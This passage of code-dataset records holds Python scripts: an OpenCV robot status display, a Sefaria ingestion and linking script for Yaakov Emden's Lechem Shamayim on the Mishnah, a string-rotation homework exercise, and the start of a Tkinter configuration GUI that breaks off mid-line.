+{"seq_id":"554226007","text":"#!/usr/bin/env python2.7\nfrom robot import Robot\nimport cv2\nimport numpy as np\nimport time\nfrom behaviours import *\n\n# The window, updated by the Sequencer, that shows the current status & objective of the program\nclass StatusWindow:\n def __init__(self, robot, time_started):\n self.robot = robot\n self.time_started = time_started\n cv2.namedWindow('Status', 1)\n\n def get_time_elapsed(self):\n now = time.time()\n diff = round(now - self.time_started, 2)\n return str(str(diff) + \" seconds\")\n\n def update(self, cycle_count):\n # The blank canvas to show\n image = np.ones([430, 320, 3]) * 255\n sequencer = self.robot.sequencer\n\n # Time-related metrics\n elapsed = ['Elapsed: ' + self.get_time_elapsed()]\n cycles = ['Cycles: ' + str(cycle_count)]\n # Robot current position (from AMCL)\n odom = ['X: ' + str(round(self.robot.pose.px, 2)), 'Y: ' + str(round(self.robot.pose.py, 2))]\n # Current behaviour status\n behaviour = ['Behaviour: ' + sequencer.current_behaviour.name]\n if isinstance(sequencer.current_behaviour, Exploration):\n behaviour = behaviour + [' Towards: (' + str(sequencer.current_behaviour.last_goal_wx) + \", \"\n + str(sequencer.current_behaviour.last_goal_wy) + \")\"]\n elif isinstance(sequencer.current_behaviour, Homing):\n behaviour = behaviour + [' obj_id: ' + str(sequencer.current_behaviour.current_object_id)]\n behaviour = behaviour + [' goal_x: ' + str(sequencer.current_behaviour.target_pose.px)]\n behaviour = behaviour + [' goal_y: ' + str(sequencer.current_behaviour.target_pose.py)]\n behaviour = behaviour + ['Idle: ' + str(self.robot.idle_tracker.idle)]\n\n # Object statuses (whether found, how many times seen and approximated location)\n green_seen_at = self.robot.seen_store.positions[0]\n green_seen_at[0] = round(green_seen_at[0], 3)\n green_seen_at[1] = round(green_seen_at[1], 1)\n red_seen_at = 
self.robot.seen_store.positions[1]\n        red_seen_at[0] = round(red_seen_at[0], 3)\n        red_seen_at[1] = round(red_seen_at[1], 1)\n        blue_seen_at = self.robot.seen_store.positions[2]\n        blue_seen_at[0] = round(blue_seen_at[0], 3)\n        blue_seen_at[1] = round(blue_seen_at[1], 1)\n        white_seen_at = self.robot.seen_store.positions[3]\n        white_seen_at[0] = round(white_seen_at[0], 3)\n        white_seen_at[1] = round(white_seen_at[1], 1)\n        objects = ['Objects found:',\n                   ' Green cuboid: ' + str(self.robot.is_object_found(0)),\n                   ' Seen x' + str(self.robot.get_times_seen(0)),\n                   ' Seen at (' + str(green_seen_at) + ')',\n                   ' Red hydrant: ' + str(self.robot.is_object_found(1)),\n                   ' Seen x' + str(self.robot.get_times_seen(1)),\n                   ' Seen at (' + str(red_seen_at) + ')',\n                   ' Blue mailbox: ' + str(self.robot.is_object_found(2)),\n                   ' Seen x' + str(self.robot.get_times_seen(2)),\n                   ' Seen at (' + str(blue_seen_at) + ')',\n                   ' White cube: ' + str(self.robot.is_object_found(3)),\n                   ' Seen x' + str(self.robot.get_times_seen(3)),\n                   ' Seen at (' + str(white_seen_at) + ')',]\n\n        offset = 18\n        x, y = 10, 30\n        # Write all of the lines of text we just generated to the blank canvas\n        for idx, lbl in enumerate(elapsed + cycles + odom + behaviour + objects):\n            cv2.putText(image, str(lbl), (x, y + offset * idx), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 0), 1)\n\n        cv2.imshow(\"Status\", image)\n        cv2.waitKey(3)\n","sub_path":"scripts/status.py","file_name":"status.py","file_ext":"py","file_size_in_byte":3788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"300035280","text":"import django\n\ndjango.setup()\nsuperuser_id = 171118\n# import statistics\nimport csv\nfrom sefaria.model import *\nfrom sefaria.helper.schema import insert_last_child, reorder_children\nfrom sefaria.helper.schema import remove_branch\nfrom sefaria.tracker import modify_bulk_text\nfrom sefaria.helper.category import create_category\nfrom sefaria.system.database import db\nimport time\nimport docx\nfrom docx import Document\nimport re\nimport Levenshtein\n\nseder = \"Zeraim\"\nmasechtot = [\n\"Berakhot\",\n    \"Peah\",\n    \"Demai\",\n    \"Kilayim\",\n    \"Sheviit\",\n    \"Terumot\",\n    \"Maasrot\",\n    \"Maaser Sheni\",\n    \"Challah\",\n    \"Orlah\",\n    \"Bikkurim\"]\n# masechtot = [\"Shabbat\",\n#              \"Eruvin\",\n#              \"Pesachim\",\n#              \"Shekalim\",\n#              \"Yoma\",\n#              \"Sukkah\",\n#              \"Beitzah\",\n#              \"Rosh Hashanah\",\n#              \"Ta'anit\",\n#              \"Megillah\",\n#              \"Moed Katan\",\n#              \"Chagigah\"\n#              ]\n# masechtot = [\"Yevamot\",\n#              \"Ketubot\",\n#              \"Nedarim\",\n#              \"Nazir\",\n#              \"Sotah\",\n#              \"Gittin\",\n#              \"Kiddushin\",\n#              ]\n# masechtot = [\n#     \"Bava Kamma\",\n#     \"Bava Metzia\",\n#     \"Bava Batra\",\n#     \"Sanhedrin\",\n#     \"Makkot\",\n#     \"Shevuot\",\n#     \"Eduyot\",\n#     \"Avodah Zarah\",\n#     # \"Pirkei Avot\",\n#     \"Horayot\"\n# ]\n# masechtot = [\n#     \"Zevachim\",\n#     \"Menachot\",\n#     \"Chullin\",\n#     \"Bekhorot\",\n#     \"Arakhin\",\n#     \"Temurah\",\n#     \"Keritot\",\n#     \"Meilah\",\n#     \"Tamid\",\n#     \"Middot\",\n#     \"Kinnim\"\n# ]\n# masechtot = [\n#     \"Kelim\",\n#     \"Oholot\",\n#     \"Negaim\",\n#     \"Parah\",\n#     \"Tahorot\",\n#     \"Mikvaot\",\n#     \"Niddah\",\n#     \"Makhshirin\",\n#     \"Zavim\",\n#     \"Tevul Yom\",\n#     \"Yadayim\",\n#     \"Oktzin\"\n# ]\nmasechtot_he = [\n    \"ברכות\",\n    \"פאה\",\n    \"דמאי\",\n    \"כלאים\",\n    \"שביעית\",\n    \"תרומות\",\n    \"מעשרות\",\n    \"מעשר שני\",\n    \"חלה\",\n    \"ערלה\",\n    \"ביכורים\"]\n# masechtot_he = [\"שבת\",\n#                 \"עירובין\",\n#                 \"פסחים\",\n#                 \"שקלים\",\n#                 \"יומא\",\n#                 \"סוכה\",\n#                 \"ביצה\",\n#                 \"ראש השנה\",\n#                 \"תענית\",\n#                 \"מגילה\",\n# 
\"מועד קטן\",\n# \"חגיגה\"]\n# masechtot_he = [\"יבמות\",\n# \"כתובות\",\n# \"נדרים\",\n# \"נזיר\",\n# \"סוטה\",\n# \"גיטין\",\n# \"קידושין\"]\n# masechtot_he = [\n# \"בבא קמא\",\n# \"בבא מציעא\",\n# \"בבא בתרא\",\n# \"סנהדרין\",\n# \"מכות\",\n# \"שבועות\",\n# \"עדיות\",\n# \"עבודה זרה\",\n# # \"אבות\",\n# \"הוריות\"\n# ]\n# masechtot_he = [\n# \"זבחים\",\n# \"מנחות\",\n# \"חולין\",\n# \"בכורות\",\n# \"ערכין\",\n# \"תמורה\",\n# \"כריתות\",\n# \"מעילה\",\n# \"תמיד\",\n# \"מידות\",\n# \"קינים\"\n# ]\n# masechtot_he = [\n# \"כלים\",\n# \"אהלות\",\n# \"נגעים\",\n# \"פרה\",\n# \"טהרות\",\n# \"מקואת\",\n# \"נדה\",\n# \"מכשירין\",\n# \"זבים\",\n# \"טבול יום\",\n# \"ידים\",\n# \"עוקצים\"\n# ]\n\ndef compute_gematria(word):\n # Define the numerical values of each letter\n gematria = {'א': 1, 'ב': 2, 'ג': 3, 'ד': 4, 'ה': 5, 'ו': 6, 'ז': 7, 'ח': 8, 'ט': 9, 'י': 10, 'כ': 20, 'ל': 30, 'מ': 40, 'נ': 50, 'ס': 60, 'ע': 70, 'פ': 80, 'צ': 90, 'ק': 100, 'ר': 200, 'ש': 300, 'ת': 400}\n\n # Compute the Gematria of the word\n total = 0\n for letter in word:\n if letter in gematria:\n total += gematria[letter]\n\n return total\ndef extract_last_word(string):\n # Split the string into words using the whitespace as the delimiter\n words = string.split()\n\n # If there are no words, return an empty string\n if len(words) == 0:\n return \"\"\n\n # Otherwise, return the last word\n return words[-1]\ndef create_fake_schema(en, he):\n root = JaggedArrayNode()\n comm_en = \"Chomat Anakh on {}\".format(en)\n comm_he = u\"חומת אנך על {}\".format(he)\n root.add_primary_titles(comm_en, comm_he)\n root.add_structure([\"Chapter\", \"Paragraph\"])\n index = {\n \"title\": comm_en,\n \"schema\": root.serialize(),\n \"categories\": [\"Tanakh\", \"Commentary\"]\n }\n post_index(index, server=\"http://localhost:8000\")\n\ndef add_new_categories():\n # create_category(['Jewish Thought', 'Guide for the Perplexed'], 'Guide for the Perplexed', \"מורה נבוכים\")\n # create_category(['Jewish Thought', 'Guide for the Perplexed', \"Commentary\"], 'Commentary', \"מפרשים\")\n # create_category(['Mishnah', 'Acharonim on Mishnah', 'Lechem Shamayim', 'Seder ' + 'Zeraim'], 'Seder ' + 'Zeraim')\n create_category(['Mishnah', 'Acharonim on Mishnah', 'Lechem Shamayim', 'Seder ' + 'Moed'], 'Seder ' + 'Moed')\n create_category(['Mishnah', 'Acharonim on Mishnah', 'Lechem Shamayim', 'Seder ' + 'Nashim'], 'Seder ' + 'Nashim')\n create_category(['Mishnah', 'Acharonim on Mishnah', 'Lechem Shamayim', 'Seder ' + 'Kodashim'], 'Seder ' + 'Kodashim')\n create_category(['Mishnah', 'Acharonim on Mishnah', 'Lechem Shamayim', 'Seder ' + 'Tahorot'], 'Seder ' + 'Tahorot')\n\ndef create_text_object(lines):\n text_dict ={}\n\n def ref_generator(masechet_index, perek, mishna, segment):\n return \"Lechem Shamayim on Mishnah \" + masechtot[masechet_index] + \" \" + str(perek) + \" \" + str(mishna) + \":\" + str(segment)\n masechet_index = -1\n perek_index = 0\n mishna_index = 0\n segment_index = 0\n\n\n for line in lines:\n # print(line)\n if \"סליקא מסכת\" in line:\n continue\n if ('@00' in line or '@88' in line) and \"מסכת\" in line:\n masechet_index+=1\n perek_index = 0\n mishna_index = 0\n segment_index = 0\n continue\n elif '@00' in line and \"פרק\" in line:\n # perek_index += 1\n perek_index = compute_gematria(extract_last_word(line))\n mishna_index = 0\n segment_index = 0\n elif '@22' in line:\n # mishna_index += 1\n mishna_index = compute_gematria(extract_last_word(line))\n segment_index = 0\n else:\n if line in {\"\", \" \", \" \"}:\n continue\n segment_index 
+=1\n ref_string = ref_generator(masechet_index, perek_index, mishna_index, segment_index)\n text_dict[ref_string] = line\n return text_dict\n\n\ndef parse_text(text):\n lines = text.split('\\n')\n return lines\ndef filter_dictionary_by_string(dictionary, string):\n filtered_dict = {}\n\n for key, value in dictionary.items():\n if string in key:\n filtered_dict[key] = value\n\n return filtered_dict\ndef ingest_version(map_text):\n # vs = VersionState(index=library.get_index(\"Introductions to the Babylonian Talmud\"))\n # vs.delete()\n # print(\"deleted version state\")\n # def filter_dictionary_by_string(dictionary, string):\n # filtered_dict = {}\n #\n # for key, value in dictionary.items():\n # if string in key:\n # filtered_dict[key] = value\n #\n # return filtered_dict\n\n for masechet in masechtot:\n # if masechet == 'Berakhot':\n # continue\n masechet_map = filter_dictionary_by_string(map_text, masechet)\n print(\"ingesting masechet \"+ masechet)\n\n\n index = library.get_index('Lechem Shamayim on Mishnah '+ masechet)\n cur_version = VersionSet({'title': 'Lechem Shamayim on Mishnah '+ masechet})\n if cur_version.count() > 0:\n cur_version.delete()\n print(\"deleting existing version\")\n chapter = index.nodes.create_skeleton()\n version = Version({\"versionTitle\": \"Jerusalem, 1978\",\n \"versionSource\": \"https://www.nli.org.il/he/books/NNL_ALEPH990012730190205171/NLI\",\n \"title\": 'Lechem Shamayim on Mishnah '+ masechet,\n \"language\": \"he\",\n \"chapter\": chapter,\n \"digitizedBySefaria\": True,\n \"license\": \"PD\",\n \"status\": \"locked\"\n })\n modify_bulk_text(superuser_id, version, masechet_map)\n\ndef read_docx(file_path):\n doc = docx.Document(file_path)\n text = []\n for paragraph in doc.paragraphs:\n text.append(paragraph.text)\n return '\\n'.join(text)\n\ndef create_index_dict(masechet_name_en, masechet_name_he):\n node = JaggedArrayNode()\n # addressTypes': ['Perek', 'Mishnah', 'Integer'], 'sectionNames': ['Chapter', 'Mishnah', 'Comment'],\n node.sectionNames = ['Chapter', 'Mishnah', 'Comment']\n node.add_structure(['Chapter', 'Mishnah', 'Comment'])\n node.addressTypes = ['Perek', 'Mishnah', 'Integer']\n # node.key = 'Lechem Shamayim on Mishna' + masechet_name_en\n node.add_primary_titles('Lechem Shamayim on Mishnah ' + masechet_name_en, 'לחם שמים על משנה '+ masechet_name_he)\n node.validate()\n\n index_dict = {'title': 'Lechem Shamayim on Mishnah '+ masechet_name_en,\n 'categories': ['Mishnah', 'Acharonim on Mishnah', 'Lechem Shamayim', 'Seder ' + seder],\n \"schema\": node.serialize(),\n # 'schema': {'nodeType': 'JaggedArrayNode', 'depth': 3, 'addressTypes': ['Perek', 'Mishnah', 'Integer'], 'sectionNames': ['Chapter', 'Mishnah', 'Comment'],\n # 'titles': [{'lang': 'he', 'text': 'לחם שמים על '+ masechet_name_he, 'primary': True},\n # {'text': 'Lechem Shamayim on ' + masechet_name_en, 'lang': 'en', 'primary': True}],\n # 'key': 'Lechem Shamayim on '+ masechet_name_en},\n 'authors': ['yaakov-emden'],\n 'enDesc': \"Commentary of R' Yaakov Emden on Mishnah.\", 'heDesc': \"ביאור לר' יעקב עמדין על המשנה.\",\n 'pubDate': '1728', 'compDate': '1725', 'pubPlace': 'Altona', 'errorMargin': '3', 'era': 'AH',\n 'dependence': 'Commentary',\n 'base_text_titles': ['Mishnah ' + masechet_name_en],\n 'base_text_mapping': None,\n 'collective_title': 'Lechem Shamayim'}\n return index_dict\ndef post_indices():\n from sources.functions import post_index, post_text\n for masechet_en, masechet_he in zip(masechtot, masechtot_he):\n index = create_index_dict(masechet_en, masechet_he)\n 
post_index(index)\n        # post_index(index, server=\"https://lechemshamayim.cauldron.sefaria.org\") #, server = \"https://piaseczno.cauldron.sefaria.org\"\ndef post_intro_index():\n    from sources.functions import post_index\n\n    index_dict = {'title': 'Lechem Shamayim, Introduction to Mishnah Commentary',\n                  'categories': ['Mishnah', 'Acharonim on Mishnah', 'Lechem Shamayim'],\n                  \"schema\": {\"nodeType\": \"JaggedArrayNode\", \"depth\": 1, \"addressTypes\": [\"Integer\"], \"sectionNames\": [\"Paragraph\"], \"titles\": [{\"primary\": True, \"lang\": \"en\", \"text\": \"Lechem Shamayim, Introduction to Mishnah Commentary\"}, {\"primary\": True, \"lang\": \"he\", \"text\": \"לחם שמים, הקדמה לפירוש המשנה\"},], \"key\": \"Lechem Shamayim, Introduction to Mishnah Commentary\"},\n                  # 'schema': {'nodeType': 'JaggedArrayNode', 'depth': 3, 'addressTypes': ['Perek', 'Mishnah', 'Integer'], 'sectionNames': ['Chapter', 'Mishnah', 'Comment'],\n                  #            'titles': [{'lang': 'he', 'text': 'לחם שמים על '+ masechet_name_he, 'primary': True},\n                  #                       {'text': 'Lechem Shamayim on ' + masechet_name_en, 'lang': 'en', 'primary': True}],\n                  #            'key': 'Lechem Shamayim on '+ masechet_name_en},\n                  'authors': ['yaakov-emden'],\n                  # 'enDesc': \"Commentary of R' Yaakov Emden on Mishnah.\", 'heDesc': \"ביאור לר' יעקב עמדין על המשנה.\",\n                  'pubDate': '1728', 'compDate': '1725', 'pubPlace': 'Altona', 'errorMargin': '3', 'era': 'AH',\n                  'collective_title': 'Lechem Shamayim'}\n    post_index(index_dict, server=\"https://lechemshamayim.cauldron.sefaria.org\")\ndef prettify_version(text_object):\n    def add_bold_tags(text):\n        # Add <b> tags before @11\n        text = re.sub(r'(@11)', r'<b>\\1', text)\n\n        # Add </b> tags before @33\n        text = re.sub(r'(@33)', r'</b>\\1', text)\n\n        # Add <b> tags before @44\n        text = re.sub(r'(@44)', r'<b>\\1', text)\n\n        # Add </b> tags before @55\n        text = re.sub(r'(@55)', r'</b>\\1', text)\n\n\n\n        return text\n\n    def remove_at_and_digits(text):\n        cleaned_text = re.sub(r'[@\\d]', '', text)\n        return cleaned_text\n\n    for ref, line in text_object.items():\n        line = add_bold_tags(line)\n        line = remove_at_and_digits(line)\n        text_object[ref] = line\n\ndef extract_integers(string):\n    pattern = r'\\d+'\n    matches = re.findall(pattern, string)\n    integers = [int(match) for match in matches]\n    return integers\ndef validate_document(file_path):\n    def find_misplaced_endings(strings):\n\n        misplaced_indexes = []\n        last_ending = None\n        last_cardinal_tuple = (0,0,0)\n        for i, string in enumerate(strings):\n            ending = extract_integers(string)\n            cardinal_tuple = (ending[0], ending[1], ending[2])\n\n\n            if last_cardinal_tuple and cardinal_tuple < last_cardinal_tuple:\n                misplaced_indexes.append(i)\n            last_cardinal_tuple = cardinal_tuple\n\n        return misplaced_indexes\n\n    def get_key_value_by_index(dictionary, index):\n        items = list(dictionary.items())\n        if 0 <= index < len(items):\n            return items[index]\n        else:\n            raise IndexError(\"Index out of range\")\n\n    docx_text = read_docx(file_path)\n    parsed_version = parse_text(docx_text)\n    text_obj = create_text_object(parsed_version)\n    # prettify_version(text_obj)\n\n    for masechet in masechtot:\n        masechet_map = filter_dictionary_by_string(text_obj, masechet)\n        refs_in_order = list(masechet_map.keys())\n        misplaced = find_misplaced_endings(refs_in_order)\n        for index in misplaced:\n            print(\"mismatches masechet \" + masechet)\n            ref, text = get_key_value_by_index(masechet_map, index)\n            print(ref + \" :\")\n            print(text)\n\ndef parse_and_ingest_intro(file_path):\n    docx_text = read_docx(file_path)\n    lines = docx_text.split('\\n')\n    lines = [line for line in 
lines if line != '']\n    intro_map = {}\n    for index, line in enumerate(lines):\n        # Add <b> tags around @22 headings\n        if '@22' in line:\n            line = '<b>' + line + '</b>'\n        # Add <b> tags before @11\n        line = re.sub(r'(@11)', r'<b>\\1', line)\n\n        # Add </b> tags before @33\n        line = re.sub(r'(@33)', r'</b>\\1', line)\n\n        # Add <b> tags before @44\n        line = re.sub(r'(@44)', r'<b>\\1', line)\n\n        # Add </b> tags before @55\n        line = re.sub(r'(@55)', r'</b>\\1', line)\n\n        line = re.sub(r'[@\\d]', '', line)\n        intro_map[\"Lechem Shamayim, Introduction to Mishnah Commentary \"+ str(index+1)] = line\n    index = library.get_index('Lechem Shamayim, Introduction to Mishnah Commentary')\n    cur_version = VersionSet({'title': 'Lechem Shamayim, Introduction to Mishnah Commentary'})\n    if cur_version.count() > 0:\n        cur_version.delete()\n        print(\"deleting existing version\")\n    chapter = index.nodes.create_skeleton()\n    version = Version({\"versionTitle\": \"Jerusalem, 1978\",\n                       \"versionSource\": \"https://www.nli.org.il/he/books/NNL_ALEPH990012730190205171/NLI\",\n                       \"title\": 'Lechem Shamayim, Introduction to Mishnah Commentary',\n                       \"language\": \"he\",\n                       \"chapter\": chapter,\n                       \"digitizedBySefaria\": True,\n                       \"license\": \"PD\",\n                       \"status\": \"locked\"\n                       })\n    modify_bulk_text(superuser_id, version, intro_map)\n\ndef handle_mishne(file_path_mishne, file_path_lechem):\n    docx_text_mishne = read_docx(file_path_mishne)\n    parsed_version_mishne = parse_text(docx_text_mishne)\n    text_obj_mishne = create_text_object(parsed_version_mishne)\n    prettify_version(text_obj_mishne)\n\n    docx_text = read_docx(file_path_lechem)\n    parsed_version = parse_text(docx_text)\n    text_obj = create_text_object(parsed_version)\n    prettify_version(text_obj)\n\n    def find_key_and_max_last_integer(dictionary, prefix):\n        matched_keys = [key for key in dictionary if key.startswith(prefix)]\n        matched_keys_with_integer = [key for key in matched_keys if key[len(prefix):].split(':')[-1].isdigit()]\n\n        if not matched_keys_with_integer:\n            return None, 0\n\n        max_key = max(matched_keys_with_integer, key=lambda key: int(key[len(prefix):].split(':')[-1]))\n        max_integer = int(max_key[len(prefix):].split(':')[-1])\n        return max_key, max_integer\n\n    for key in text_obj_mishne:\n        prefix = key.split(':')[0]+':'\n        print(prefix)\n        a,b = find_key_and_max_last_integer(text_obj, prefix)\n        mishne_lechem_string = \"משנה לחם\"\n        text_obj[prefix+str(b+1)] = \"<b>\" + mishne_lechem_string + \"
</b>\" + text_obj_mishne[key].rstrip() + \"
<br>\"\n\n    ingest_version(text_obj)\n\ndef add_links():\n\n    def list_of_dict_to_links(dicts):\n        list_of_dicts = []\n        for d in dicts:\n            list_of_dicts.append(Link(d))\n        return list_of_dicts\n\n    def clean_links(masechet):\n        query = {\"refs\": {\"$regex\": \"Lechem Shamayim on Mishnah \"+ masechet }}\n        list_of_links = LinkSet(query).array()\n        for l in list_of_links:\n            print(\"deleted link!\")\n            l.delete()\n    def insert_links_to_db(list_of_links):\n        for l in list_of_links:\n            l.save()\n    def delete_until_last_colon(s):\n        if ':' in s:\n            s = s[:s.rindex(':')]\n        return s\n\n    def delete_until_first_digit(s):\n        for i in range(len(s)):\n            if s[i].isdigit():\n                return s[i:]\n\n    def check_bold_period(text):\n        text = text.replace(\" \", \"\")\n        if text.startswith(\"<b>\") and \"</b>\" in text and text.index(\"
</b>\") + len(\"</b>\") < len(text) and text[\n            text.index(\"</b>\") + len(\"</b>\")].strip() == '.':\n            return True\n        if text.startswith(\"<b>\") and \"</b>\" in text and text.index(\"</b>\") + len(\"</b>\") < len(text) and text[\n            text.index(\"</b>\") -1].strip() == '.':\n            return True\n        else:\n            return False\n\n    # def get_bold_substring(text):\n    #     start_tag = \"<b>\"\n    #     end_tag = \"</b>\"\n    #     start_index = text.find(start_tag)\n    #     if start_index != -1:\n    #         start_index += len(start_tag)\n    #         end_index = text.find(end_tag, start_index)\n    #         if end_index != -1:\n    #             return text[start_index:end_index]\n    #     return None\n    def extract_dibbur(input_string):\n        substring = input_string\n        # Find the index of the first period\n        # period_index = input_string.find('.')\n        # if period_index != -1:\n        #     # Extract the substring until the first period\n        #     substring = input_string[:period_index]\n        # etc_index = input_string.find(\"וכו'\")\n        # if etc_index != -1:\n        #     # Extract the substring until the first period\n        #     substring = input_string[:etc_index]\n        # etc_index2 = input_string.find(\"כו'\")\n        # if etc_index2 != -1:\n        #     # Extract the substring until the first period\n        #     substring = input_string[:etc_index2]\n        bold_index = input_string.find('</b>')\n        if bold_index != -1:\n            # Extract the substring up to the closing bold tag\n            substring = input_string[:bold_index]\n\n\n        # Remove '<b>' and '</b>' from the substring\n        substring = substring.replace('<b>', '').replace('</b>', '')\n\n        return substring\n\n\n    def is_likely_quoted(s1, s2):\n        s1_length = len(s1)\n        s2_length = len(s2)\n        # if s1_length == 0:\n        #     return False\n\n        if s1_length >= s2_length:\n            return False\n\n        for i in range(s2_length - s1_length + 1):\n            sub_s2 = s2[i:i + s1_length]\n\n            distance = Levenshtein.distance(s1, sub_s2)\n            similarity = 1 - (distance / s1_length)\n\n            if similarity >= 0.7:  # Adjust this threshold as needed\n                return True\n\n        return False\n    def start_new_sequence(tref, corresponding_mishnah_tref):\n\n\n        seg_num = extract_integers(tref)[-1]\n        if seg_num == 1:\n            return True\n        text = Ref(tref).text('he').text\n\n        if \"אבל מניחה לגת הבאה\" in text:\n            a = 8\n\n\n        if \"משנה לחם\" in text:\n            return True\n        if check_bold_period(text.strip()):\n            return True\n        if not text.startswith('<b>'):\n            return False\n        # if \"$\" in text or text == '':\n        #     return False\n\n        suspected_dibbur = extract_dibbur(text)\n        if suspected_dibbur is None:\n            return False\n        suspected_dibbur = suspected_dibbur.strip()\n        suspected_base_text = Ref(corresponding_mishnah_tref).text('he', \"Mishnah, ed. 
Romm, Vilna 1913\").text.strip()\n        if is_likely_quoted(suspected_dibbur, suspected_base_text):\n            return True\n\n        else:\n            return False\n\n\n\n\n\n\n    auto_links = []\n\n    for masechet in masechtot:\n        # masechet_name = get_last_two_words(index)\n        print(\"Linking Masechet \"+ masechet)\n        clean_links(masechet)\n\n        segment_refs = Ref(\"Lechem Shamayim on Mishnah \"+ masechet).all_segment_refs()\n        trefs_sequence = []\n        previous_tref_chapter = 0\n        for seg_ref in segment_refs:\n            current_tref_chapter = extract_integers(seg_ref.tref)[0]\n            corresponding_mishnah_tref = \"Mishnah \" + masechet + ' ' + delete_until_first_digit(delete_until_last_colon(seg_ref.tref))\n\n\n            if current_tref_chapter != previous_tref_chapter or start_new_sequence(seg_ref.tref, corresponding_mishnah_tref):\n                if trefs_sequence:\n                    extended_tref = Ref(trefs_sequence[0]).to(Ref(trefs_sequence[-1])).tref\n                    auto_links.append(\n                        {\n                            \"refs\": [\n                                extended_tref,\n                                \"Mishnah \" + masechet + ' ' + delete_until_first_digit(delete_until_last_colon(trefs_sequence[-1]))\n                            ],\n                            \"type\": \"Commentary\",\n                            \"auto\": True\n                        }\n                    )\n                    trefs_sequence.clear()\n                trefs_sequence.append(seg_ref.tref)\n            else:\n                trefs_sequence.append(seg_ref.tref)\n            previous_tref_chapter = current_tref_chapter\n        if trefs_sequence:\n            extended_tref = Ref(trefs_sequence[0]).to(Ref(trefs_sequence[-1])).tref\n            auto_links.append(\n                {\n                    \"refs\": [\n                        extended_tref,\n                        corresponding_mishnah_tref\n                    ],\n                    \"type\": \"Commentary\",\n                    \"auto\": True\n                }\n            )\n\n\n\n    auto_links = list_of_dict_to_links(auto_links)\n    insert_links_to_db(auto_links)\n\n\nif __name__ == '__main__':\n    print(\"hello world\")\n    # add_new_categories()\n    file_path = \"lechem_nashim.docx\"\n    # post_indices()\n    #\n    # docx_text = read_docx(file_path)\n    # parsed_version = parse_text(docx_text)\n    # text_obj = create_text_object(parsed_version)\n    # prettify_version(text_obj)\n    # ingest_version(text_obj)\n    # handle_mishne(\"mishne_zeraim.docx\", \"lechem_zeraim.docx\")\n\n\n\n    # \"Guide for the Perplexed, Part 1 2:7\"\n    # ingest_nodes()\n\n    # obj = create_text_object()\n    # print(obj)\n    # ingest_version(obj)\n    # add_new_categories()\n    # validate_document(\"mishne_moed.docx\")\n\n    # post_intro_index()\n    # parse_and_ingest_intro(\"lechem_intro.docx\")\n\n    add_links()\n\n\n\n\n\n\n\n\n","sub_path":"sources/lechem_shamayim/ingest_lechem.py","file_name":"ingest_lechem.py","file_ext":"py","file_size_in_byte":24373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"565907324","text":"# Structure this script entirely on your own.\n# See Chapter 8: Strings Exercise 5 for the task.\n# Please do provide function calls that test/demonstrate your\n# function.\n\ndef rotate_word(strEncode, intRotate):\n\t# initialise the output variable\n\toutput = ''\n\n\t# normalise the rotation to the range [0, 25] so that negative and large rotations work\n\tintRotate = intRotate % 26\n\n\t# loop through the entire string and populate the output variable by appending the rotated characters\n\tfor strCharacter in strEncode:\n\t\tif(ord(strCharacter) >= 65 and ord(strCharacter) <= 90):\n\t\t\toutput += chr(65 + ((ord(strCharacter) + intRotate) % 65) % 26)\n\t\telif(ord(strCharacter) >= 97 and ord(strCharacter) <= 122):\n\t\t\toutput += chr(97 + ((ord(strCharacter) + intRotate) % 97) % 26)\n\t\telse:\n\t\t\toutput += strCharacter\n\n\treturn output\n\ndef main():\n\n\tprint(\"The program will ask you to input a String to encrypt and a number to rotate the string. 
To end, type an empty string\\n\")\n\twhile True:\n\t\tusrInput = input(\"Enter A String To Encrypt: \")\n\t\tif(usrInput == ''):\n\t\t\tbreak\n\t\tnumRotate = int(input(\"Enter A Number: \"))\n\n\t\tprint(\"The Encrypted String Is:\", rotate_word(usrInput, numRotate) + \"\\n\")\n\nif __name__ == '__main__':\n\tmain()","sub_path":"HW04_ch08_ex05.py","file_name":"HW04_ch08_ex05.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"511424410","text":"from Tkinter import *\nfrom config import *\nfrom pickle import *\n\nclass Gui:\n font = \"6x13\"\n\n def labeledEntry(self, title):\n title = title + \":\"\n l = Label(self.frame, text=title, font=self.font)\n l.grid(row=self.row, sticky=E)\n e = Entry(self.frame, font=self.font)\n e.grid(row=self.row, column=1)\n self.row = self.row + 1\n return (e, l)\n\n def configLabel(self, title, field, isint=1):\n (entry, label) = self.labeledEntry(title)\n entry.insert(END, config.__dict__[field])\n self.fields[field] = (entry, isint, title, label)\n\n def blankRow(self):\n msg = Label(self.frame, text=\"\", font=self.font)\n msg.grid(row=self.row, columnspan=2)\n self.row = self.row + 1\n return msg\n\n def choices(self, list, current):\n v = IntVar()\n cframe = Frame(self.frame)\n cframe.grid(row=self.row, columnspan=2)\n self.row = self.row + 1\n idx = 1\n for choice in list:\n rb = Radiobutton(cframe, text=choice[0], command=choice[1], value=idx)\n rb.grid(row=0, column=idx)\n if idx == current:\n rb.select()\n idx = idx + 1\n\n def defs(self):\n config = Config()\n for field in self.fields.keys():\n entry = self.fields[field][0]\n entry.delete(0, END)\n entry.insert(END, config.__dict__[field])\n \n def save(self):\n for field in self.fields.keys():\n (entry, isint, title, label) = self.fields[field]\n val = entry.get()\n if isint:\n try:\n val = int(val)\n except:\n self.msg.config(text=title + \" must be an integer\")\n return\n config.__dict__[field] = val\n \n cf = open(\"field.config\", \"w+\")\n dump(config, cf)\n cf.close()\n self.root.quit()\n return\n\n def configField(self, name, newState):\n self.fields[name][0].config(state=newState)\n # Not all versions support state on labels\n if newState == DISABLED:\n colour = \"darkgrey\"\n else:\n colour = \"black\"\n self.fields[name][3].config(fg=colour)\n\n def choose_ser(self):\n config.use_ip = 0\n #self.configField(\"sf_port\", DISABLED)\n\n def choose_ip(self):\n config.use_ip = 1\n #self.configField(\"sf_port\", NORMAL)\n\n def __init__(self, root):\n self.row = 0\n self.fields = {}\n self.root = root\n self.frame = Frame(root)\n self.frame.pack()\n \n root.title(\"Field Configuration\")\n self.choices(((\"Serial\", self.choose_ser), (\"IP\", self.choose_ip)), config.use_ip + 1)\n self.configLabel(\"Host/Serial\", \"sf_host\", 0)\n self.configLabel(\"Port/Baud\", \"sf_port\")\n self.configLabel(\"Group\", \"group\")\n self.configLabel(\"Local Id\", \"local_id\")\n self.configLabel(\"Msg 